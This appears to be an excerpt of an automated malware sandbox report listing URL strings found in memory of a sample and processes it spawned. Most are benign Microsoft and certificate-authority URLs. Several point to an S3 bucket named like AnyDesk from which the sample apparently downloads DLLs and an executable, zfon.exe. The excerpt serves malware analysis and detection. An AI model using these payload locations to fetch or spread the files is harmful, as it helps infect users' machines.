Source: explorer.exe, 0000000C.00000002.2046865328.0000000004405000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobe
Source: explorer.exe, 0000000F.00000003.2065246181.0000000004B64000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobe.
Source: explorer.exe, 0000000F.00000003.2065246181.0000000004B64000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobe.c
Source: explorer.exe, 0000000F.00000003.2065246181.0000000004B64000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobe.co
Source: explorer.exe, 0000000C.00000000.2019785320.0000000004405000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobeS
Source: nrGkqbCyKP.exe | String found in binary or memory: http://ocsp.comodoca.com0
Source: nrGkqbCyKP.exe, libcef.0.dr | String found in binary or memory: http://ocsp.digicert.com0
Source: nrGkqbCyKP.exe, libcef.0.dr | String found in binary or memory: http://ocsp.digicert.com0A
Source: nrGkqbCyKP.exe, libcef.0.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: nrGkqbCyKP.exe | String found in binary or memory: http://ocsp.digicert.com0O
Source: nrGkqbCyKP.exe, libcef.0.dr | String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 0000000C.00000002.2048969994.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2022719564.00000000090DA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: nrGkqbCyKP.exe | String found in binary or memory: http://ocsp.sectigo.com0
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://s3-r-w.ap-east-1.amazonaws.com
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://s3-r-w.ap-east-1.amazonaws.comd
Source: explorer.exe, 0000000C.00000000.2021531603.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.2046017334.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048244736.0000000007720000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.11.drString found in binary or memory: http://upx.sf.net
Source: nrGkqbCyKP.exe, libcef.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 0000000C.00000000.2022719564.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.0000000009237000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
Source: explorer.exe, 0000000C.00000000.2025979008.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2053283744.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 0000000C.00000000.2025979008.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2053283744.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000C.00000000.2025979008.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2053283744.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSA4
Source: explorer.exe, 0000000C.00000000.2025979008.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2053283744.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
Source: nrGkqbCyKP.exeString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/(
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/MSVCP140.dll
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/VCRUNTIME140.dll
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/aut.png
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.00000000029EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/libcef.dll
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/vcruntime140_1.dll
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/view.png
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.com/zfon.exe
Source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anydesk17.s3.ap-east-1.amazonaws.comH
Source: explorer.exe, 0000000C.00000000.2020477282.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2750262921.0000000008F1E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2146195587.0000000008F1E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2123363356.0000000008F79000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.0000000008F1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2123363356.0000000008FFF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007793000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007793000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000C.00000002.2048969994.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2022719564.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
Source: explorer.exe, 0000000F.00000003.2146195587.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126404678.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2123908196.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2750262921.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.000000000906A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?l
Source: explorer.exe, 0000000C.00000000.2022719564.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2130807598.0000000009091000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.0000000009091000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2146195587.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2750262921.0000000009085000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2122983745.000000000908A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126233626.0000000009091000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000C.00000000.2022719564.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comW
Source: explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
Source: explorer.exe, 0000000C.00000002.2053283744.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2025979008.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126404678.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2123908196.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.000000000906A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
Source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003991000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.1991891496.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000000.1992853353.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drString found in binary or memory: https://nydus.battle.net/App/
Source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003991000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.1991891496.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000000.1992853353.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drString found in binary or memory: https://nydus.battle.net/Bnet/client/purchase/jsutil
Source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003991000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.1991891496.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000000.1992853353.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drString found in binary or memory: 